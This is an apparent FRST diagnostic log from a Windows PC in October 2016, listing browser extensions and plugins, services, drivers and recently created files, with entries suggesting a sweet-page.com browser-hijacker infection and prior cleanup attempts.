Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2009-02-26] (Microsoft Corporation)
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-05-25] (Microsoft Corporation)
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll [2016-02-01] (Skype Technologies)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-05-25] (Microsoft Corporation)
Handler: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files\Trend Micro\AMSP\Module\20002\6.6.1010\6.6.1010\TmBpIe32.dll [2011-03-25] (Trend Micro Inc.)
Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - C:\Program Files\Trend Micro\AMSP\Module\20004\1.5.1504\6.6.1088\TmIEPlg.dll [2010-07-20] (Trend Micro Inc.)

FireFox:
========
FF DefaultProfile: pgyttybc._
FF ProfilePath: C:\Users\violeta\AppData\Roaming\Mozilla\Firefox\Profiles\pgyttybc._ [2016-10-17]
FF Extension: (Skype Click to Call) - C:\Program Files\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A} [2016-09-24] [not signed]
FF Extension: (Skype) - C:\Program Files\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2016-05-25]
FF HKLM\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext => not found
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Users\violeta\AppData\Roaming\okitspace\Firefox => not found
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\WebexpEnhancedV1\WebexpEnhancedV1alpha842\ff => not found
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\VideoPlayerV3\VideoPlayerV3beta322\ff => not found
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_23_0_0_185.dll [2016-10-15] ()
FF Plugin: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw_1213153.dll [2014-06-24] (Adobe Systems, Inc.)
FF Plugin: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2012-07-31] (Foxit Corporation)
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll [2015-05-21] (Google)
FF Plugin: @java.com/DTPlugin,version=11.91.2 -> C:\Program Files\Java\jre1.8.0_91\bin\dtplugin\npDeployJava1.dll [2016-07-11] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.91.2 -> C:\Program Files\Java\jre1.8.0_91\bin\plugin2\npjp2.dll [2016-07-11] (Oracle Corporation)
FF Plugin: @live.heroesandgenerals.com/npretox -> C:\Program Files\Heroes & Generals\live\npretox-1.0.6.1\npretoxlive-1.0.6.1.dll [2015-05-05] (Reto-Moto ApS)
FF Plugin: @mcafee.com/McAfeeMssPlugin -> C:\Program Files\McAfee Security Scan\3.8.141\npMcAfeeMss.dll [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=16.4.3503.0728 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2012-07-28] (Microsoft Corporation)
FF Plugin: @nexon.net/NxGame -> C:\ProgramData\NexonUS\NGM\npNxGameUS.dll [2013-02-05] (Nexon)
FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
FF Plugin: @real.com/nppl3260;version=16.0.2.32 -> C:\Program Files\Real\RealPlayer\Netscape6\nppl3260.dll [No File]
FF Plugin: @real.com/nprpplugin;version=16.0.2.32 -> C:\Program Files\Real\RealPlayer\Netscape6\nprpplugin.dll [No File]
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin HKU\S-1-5-21-3268508096-794200350-1188608446-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\violeta\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2016-07-14] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-3268508096-794200350-1188608446-1000: pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
FF Plugin HKU\S-1-5-21-3268508096-794200350-1188608446-1000: thehappycloud.com/HappyCloudPlugin -> C:\ProgramData\HappyCloud\Application\npHappyCloudPlugin.dll [2013-11-17] (The Happy Cloud)
FF Plugin HKU\S-1-5-21-3268508096-794200350-1188608446-1000: ubisoft.com/uplaypc -> C:\Program Files\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [2016-09-06] ()
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppl3260.dll [2013-08-15] (RealNetworks, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nprpplugin.dll [2013-08-15] (RealPlayer)

Chrome:
=======
CHR DefaultProfile: Profile 1
CHR HomePage: Profile 1 -> hxxps://www.google.rs/
CHR StartupUrls: Profile 1 -> "hxxp://www.google.com/","hxxp://www.sweet-page.com/?type=hp&ts=1434546381&z=ebb035f865ef946d91753c5g9z0c1zcw1zeq9c6bbz&from=cor&uid=WDCXWD5000AVVS-63H0B1_WD-WCAUK094765147651","hxxps://www.google.rs/"
CHR DefaultSearchURL: Profile 1 -> hxxp://www.sweet-page.com/web/?type=ds&ts=1434546381&z=ebb035f865ef946d91753c5g9z0c1zcw1zeq9c6bbz&from=cor&uid=WDCXWD5000AVVS-63H0B1_WD-WCAUK094765147651&q={searchTerms}
CHR DefaultSearchKeyword: Profile 1 -> sweet-page
CHR Session Restore: Profile 1 -> is enabled.
CHR Profile: C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1 [2016-09-11]
CHR Extension: (Google диск) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-01]
CHR Extension: (YouTube) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-02]
CHR Extension: (Google Search) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-01]
CHR Extension: (Google документи офлајн) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-12-12]
CHR Extension: (Плаћања у Chrome веб-продавници) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-08-11]
CHR Extension: (Gmail) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-18]
CHR HKU\S-1-5-21-3268508096-794200350-1188608446-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bhnddlaigdpagceekbpkajlgbnjbabig] - C:\Users\violeta\AppData\Local\CRE\bhnddlaigdpagceekbpkajlgbnjbabig.crx <not found>

Opera:
=======
OPR Extension: (Jungle Net) - C:\Users\violeta\AppData\Roaming\Opera Software\Opera Stable\Extensions\iffnkklnhcckdbakeemklgkangigdbbk [2015-06-17]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 c2cautoupdatesvc; C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1364096 2016-05-25] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1687680 2016-05-25] (Microsoft Corporation)
S3 c2wts; C:\Program Files\Windows Identity Foundation\v3.5\c2wtshost.exe [15768 2010-02-03] (Microsoft Corporation)
S3 EvoSvc; C:\Program Files\Echobit\Evolve\EvoSvc.exe [1583488 2015-08-18] (Echobit LLC)
S3 fussvc; C:\Program Files\Windows Kits\8.1\App Certification Kit\fussvc.exe [140800 2014-02-19] (Microsoft Corporation) [File not signed]
R2 Hamachi2Svc; C:\Program Files\LogMeIn Hamachi\hamachi-2.exe [1958408 2016-09-13] (LogMeIn Inc.)
U2 HiPatchService; C:\Program Files\Hi-Rez Studios\HiPatchService.exe [9728 2016-10-10] (Hi-Rez Studios) [File not signed]
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
R2 IpOverUsbSvc; C:\Program Files\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [22768 2014-04-17] (Microsoft Corporation)
R2 LMIGuardianSvc; C:\Program Files\LogMeIn Hamachi\LMIGuardianSvc.exe [405424 2016-08-31] (LogMeIn, Inc.)
S3 npggsvc; C:\Windows\system32\GameMon.des [5560840 2016-05-11] (INCA Internet Co., Ltd.)
S3 Origin Client Service; C:\Program Files\Origin\OriginClientService.exe [2142728 2016-10-11] (Electronic Arts)
S2 Origin Web Helper Service; C:\Program Files\Origin\OriginWebHelperService.exe [2209296 2016-10-11] (Electronic Arts)
S3 OverwolfUpdater; C:\Program Files\Overwolf\OverwolfUpdater.exe [1310448 2016-08-29] (Overwolf LTD)
R2 PnkBstrA; C:\Windows\system32\PnkBstrA.exe [76888 2012-11-03] ()
R2 Razer Game Scanner Service; C:\Program Files\Razer\Razer Services\GSS\GameScannerService.exe [188072 2015-08-15] ()
R2 RzKLService; C:\Program Files\Razer\Razer Cortex\RzKLService.exe [129168 2015-08-31] (Razer Inc.)
R2 sesvc; C:\Program Files\ShadowExplorer\sesvc.exe [9216 2013-01-02] (ShadowExplorer.com - About) [File not signed]
S2 Skype C2C Service; C:\ProgramData\Skype\Toolbars\Skype C2C Service\c2c_service.exe [3048136 2012-05-30] () [File not signed]
R2 StarWindServiceAE; C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe [275968 2007-05-28] (Rocket Division Software) [File not signed]
S3 Te.Service; C:\Program Files\Windows Kits\8.1\Testing\Runtimes\TAEF\Wex.Services.exe [91136 2013-08-21] (Microsoft Corporation) [File not signed]
R2 TeamViewer; C:\Program Files\TeamViewer\TeamViewer_Service.exe [6889232 2015-12-14] (TeamViewer GmbH)
S2 Telenor Internet. RunOuc; C:\Program Files\Telenor Internet\UpdateDog\ouc.exe [246112 2011-12-19] ()
R2 TunnelBearMaintenance; C:\Program Files\TunnelBear\TBear.Maintenance.exe [41472 2016-05-11] ()
S3 VsEtwService120; C:\Program Files\Microsoft Visual Studio 12.0\Common7\Packages\Debugger\Services\VsEtwService.exe [73360 2014-07-23] (Microsoft Corporation)
S3 VSStandardCollectorService140; C:\Program Files\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [48872 2016-03-22] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-27] (Microsoft Corporation)
S2 Amsp; "C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe" coreFrameworkHost.exe -m=rb -dt=60000 [X]
S2 HWDeviceService.exe; "C:\ProgramData\DatacardService\HWDeviceService.exe" -/service [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BroadcomWModem; C:\Windows\System32\DRIVERS\bcmww.sys [118400 2005-06-02] (Broadcom Corporation)
R3 EvolveVirtualAdapter; C:\Windows\System32\DRIVERS\evolve.sys [18584 2013-06-12] (Echobit, LLC)
R3 hamachi; C:\Windows\System32\DRIVERS\hamachi.sys [27040 2015-11-12] (LogMeIn, Inc.)
R2 IntelHaxm; C:\Windows\System32\DRIVERS\IntelHaxm.sys [78848 2015-01-30] (Intel Corporation)
R1 ISODrive; C:\Program Files\UltraISO\drivers\ISODrive.sys [82320 2010-01-29] (EZB Systems, Inc.)
S3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [22856 2013-04-04] (Malwarebytes Corporation)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [20288 2015-06-12] (Razer, Inc.)
S4 secdrv; C:\Windows\system32\Drivers\secdrv.sys [12528 2015-11-07] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.) [File not signed]
S0 sfdrv01; C:\Windows\System32\drivers\sfdrv01.sys [50176 2005-05-17] (Protection Technology) [File not signed]
R0 sfhlp02; C:\Windows\System32\drivers\sfhlp02.sys [6656 2005-05-16] (Protection Technology) [File not signed]
S0 sfsync02; C:\Windows\System32\drivers\sfsync02.sys [19968 2005-05-16] (Protection Technology) [File not signed]
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [721904 2013-07-31] () [File not signed]
R3 tap-tb-0901; C:\Windows\System32\DRIVERS\tap-tb-0901.sys [33280 2015-08-10] (The OpenVPN Project)
R3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [26624 2011-12-15] (The OpenVPN Project)
R2 tmactmon; C:\Windows\System32\DRIVERS\tmactmon.sys [80464 2012-01-06] (Trend Micro Inc.)
R2 tmcomm; C:\Windows\System32\DRIVERS\tmcomm.sys [189520 2012-01-06] (Trend Micro Inc.)
R2 tmevtmgr; C:\Windows\System32\DRIVERS\tmevtmgr.sys [64080 2012-01-06] (Trend Micro Inc.)
R1 tmtdi; C:\Windows\System32\DRIVERS\tmtdi.sys [92112 2012-01-06] (Trend Micro Inc.)
R3 XSplit_Dummy; C:\Windows\System32\drivers\xspltspk.sys [22104 2014-07-02] (SplitmediaLabs Limited)
R3 zttap200; C:\Windows\System32\DRIVERS\zttap200.sys [28824 2014-03-05] ()
U3 ai0cxrxm; C:\Windows\system32\Drivers\ai0cxrxm.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
S3 EagleXNt; \??\C:\Windows\system32\drivers\EagleXNt.sys [X]
S3 ewusbnet; system32\DRIVERS\ewusbnet.sys [X]
S3 hwusbdev; system32\DRIVERS\ewusbdev.sys [X]
U0 Partizan; system32\drivers\Partizan.sys [X]
S3 TuneUpUtilitiesDrv; \??\C:\Program Files\TuneUp Utilities 2013\TuneUpUtilitiesDriver32.sys [X]
S3 vtany; \??\C:\Windows\vtany.sys [X]
S3 XDva397; \??\C:\Windows\system32\XDva397.sys [X]
S3 XDva410; \??\C:\Windows\system32\XDva410.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-17 06:40 - 2016-10-17 06:43 - 00024810 _____ C:\Users\violeta\Desktop\FRST.txt
2016-10-17 06:39 - 2016-10-17 06:39 - 00000000 ____D C:\Users\violeta\Desktop\FRST-OlderVersion
2016-10-16 10:09 - 2016-10-16 10:09 - 00000000 ____D C:\Users\violeta\AppData\Roaming\com.cardsandcastles.game.steam
2016-10-16 10:08 - 2016-10-16 10:08 - 00000216 _____ C:\Users\violeta\Desktop\Cards and Castles.url
2016-10-14 22:10 - 2016-10-17 06:39 - 01756672 _____ (Farbar) C:\Users\violeta\Desktop\FRST.exe
2016-10-14 22:10 - 2016-10-14 22:30 - 00000000 ____D C:\FRST
2016-10-14 22:10 - 2016-10-14 22:10 - 00468480 _____ () C:\Users\violeta\Desktop\CKScanner.exe
2016-10-14 21:52 - 2016-10-14 21:52 - 03874368 _____ C:\Users\violeta\Downloads\AdwCleaner.exe
2016-10-14 14:30 - 2016-10-14 14:30 - 00000000 ____D C:\Users\violeta\AppData\Local\ElevatedDiagnostics
2016-10-13 16:48 - 2016-10-13 16:48 - 00688992 ____R (Swearware) C:\Users\violeta\Desktop\dds.scr
2016-10-13 16:46 - 2016-10-13 16:48 - 00000032 _____ C:\Users\violeta\Desktop\programi deinstalirani.txt
2016-10-13 13:51 - 2016-10-13 14:16 - 00000996 _____ C:\Users\Public\Desktop\Unity 5.4.2f1 (32-bit).lnk
2016-10-13 13:51 - 2016-10-13 13:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Unity 5.4.2f1 (32-bit)
2016-10-13 13:33 - 2016-10-13 13:33 - 00718392 _____ C:\Users\violeta\Downloads\UnityDownloadAssistant-5.4.2f1.exe
2016-10-12 21:15 - 2016-10-12 21:15 - 00000000 ____D C:\Users\violeta\Desktop\voice tcg tester_Data
2016-10-12 15:31 - 2016-10-12 15:31 - 00000121 _____ C:\Users\violeta\Desktop\trollrt.txt
2016-10-12 15:13 - 2016-10-12 15:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightshot
2016-10-12 15:13 - 2016-10-12 15:13 - 00000000 ____D C:\Program Files\Skillbrains
2016-10-12 15:12 - 2016-10-12 15:12 - 02551888 _____ (Skillbrains ) C:\Users\violeta\Downloads\setup-lightshot.exe
2016-10-12 13:56 - 2016-09-30 17:20 - 04000488 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2016-10-12 13:56 - 2016-09-30 17:20 - 03944680 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-10-12 13:56 - 2016-09-30 07:47 - 20306944 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-10-12 13:56 - 2016-09-30 07:42 - 00498688 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-10-12 13:56 - 2016-09-30 07:38 - 02286592 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-10-12 13:56 - 2016-09-30 07:12 - 04608512 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-10-12 13:56 - 2016-09-30 07:05 - 00693248 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-10-12 13:56 - 2016-09-30 07:03 - 13653504 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-10-12 13:56 - 2016-09-30 06:46 - 02444288 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-10-12 13:56 - 2016-09-30 06:43 - 01312768 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-10-12 13:56 - 2016-09-15 17:15 - 00741888 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2016-10-12 13:56 - 2016-09-12 22:54 - 00067816 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-10-12 13:56 - 2016-09-12 22:49 - 01063936 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-10-12 13:56 - 2016-09-12 22:49 - 01017856 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-10-12 13:56 - 2016-09-12 21:08 - 01251328 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2016-10-12 13:56 - 2016-09-12 21:08 - 00909824 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2016-10-12 13:56 - 2016-09-10 17:53 - 02291712 _____ (Microsoft Corporation) C:\Windows\system32\MSVidCtl.dll
2016-10-12 13:56 - 2016-09-09 17:53 - 01406976 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-10-12 13:56 - 2016-09-09 17:53 - 00488448 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-10-12 13:56 - 2016-09-09 17:53 - 00478208 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-10-12 13:56 - 2016-09-09 17:53 - 00268800 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-10-12 13:56 - 2016-09-09 17:53 - 00213504 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2016-10-12 13:56 - 2016-09-09 17:53 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2016-10-12 13:56 - 2016-09-09 17:53 - 00107008 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-10-12 13:56 - 2016-09-08 16:49 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2016-10-12 13:56 - 2016-08-16 22:27 - 00259072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbhub.sys
2016-10-12 13:56 - 2016-08-16 22:27 - 00076288 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbccgp.sys
2016-10-12 13:56 - 2016-08-16 22:26 - 00285696 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys
2016-10-12 13:56 - 2016-08-16 22:26 - 00046592 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbehci.sys
2016-10-12 13:56 - 2016-08-16 22:26 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbuhci.sys
2016-10-12 13:56 - 2016-08-16 22:26 - 00020480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbohci.sys
2016-10-12 13:56 - 2016-08-16 22:26 - 00006016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbd.sys
2016-10-12 13:56 - 2016-08-12 18:47 - 12574208 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2016-10-12 13:56 - 2016-08-12 18:47 - 11410432 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2016-10-12 13:56 - 2016-08-12 18:21 - 00437248 _____ (Microsoft Corporation) C:\Windows\system32\scavengeui.dll
2016-10-12 13:56 - 2016-08-06 17:15 - 01178112 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2016-10-12 13:56 - 2016-08-06 17:15 - 00249344 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll
2016-10-12 13:56 - 2016-08-06 17:15 - 00214016 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2016-10-12 13:56 - 2016-08-06 17:15 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2016-10-12 13:56 - 2016-08-06 16:53 - 00199168 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe
2016-10-12 13:56 - 2016-07-22 16:51 - 00123904 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe
2016-10-12 13:56 - 2016-06-14 17:25 - 00078568 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys
2016-10-12 13:56 - 2016-06-14 17:21 - 03209216 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 01329664 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 01005056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00988160 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00744960 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00519680 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00474624 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00442368 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00406016 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00374784 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00354816 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00275968 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00195072 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00157184 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2016-10-12 13:56 - 2016-06-14 17:21 - 00080896 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2016-10-12 13:56 - 2016-06-14 17:17 - 00593920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2016-10-12 13:55 - 2016-09-30 21:28 - 00346312 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-10-12 13:55 - 2016-09-30 07:54 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-10-12 13:55 - 2016-09-30 07:54 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2016-10-12 13:55 - 2016-09-30 07:42 - 00341504 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-10-12 13:55 - 2016-09-30 07:42 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2016-10-12 13:55 - 2016-09-30 07:42 - 00047616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2016-10-12 13:55 - 2016-09-30 07:41 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2016-10-12 13:55 - 2016-09-30 07:36 - 00047104 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-10-12 13:55 - 2016-09-30 07:35 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2016-10-12 13:55 - 2016-09-30 07:33 - 00476160 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-10-12 13:55 - 2016-09-30 07:32 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-10-12 13:55 - 2016-09-30 07:32 - 00620032 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2016-10-12 13:55 - 2016-09-30 07:32 - 00115712 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-10-12 13:55 - 2016-09-30 07:32 - 00102912 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2016-10-12 13:55 - 2016-09-30 07:27 - 00667648 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2016-10-12 13:55 - 2016-09-30 07:24 - 00416256 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-10-12 13:55 - 2016-09-30 07:19 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2016-10-12 13:55 - 2016-09-30 07:19 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2016-10-12 13:55 - 2016-09-30 07:17 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2016-10-12 13:55 - 2016-09-30 07:15 - 00076288 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-10-12 13:55 - 2016-09-30 07:14 - 00279040 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-10-12 13:55 - 2016-09-30 07:13 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2016-10-12 13:55 - 2016-09-30 07:07 - 00230400 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2016-10-12 13:55 - 2016-09-30 07:05 - 02055680 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-10-12 13:55 - 2016-09-30 07:05 - 01155072 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2016-10-12 13:55 - 2016-09-30 07:05 - 00689152 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-10-12 13:55 - 2016-09-30 06:42 - 00710144 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-10-12 13:55 - 2016-09-15 17:15 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2016-10-12 13:55 - 2016-09-12 22:53 - 00137960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-10-12 13:55 - 2016-09-12 22:53 - 00067304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2016-10-12 13:55 - 2016-09-12 22:49 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00655360 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-10-12 13:55 - 2016-09-12 22:49 - 00553472 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
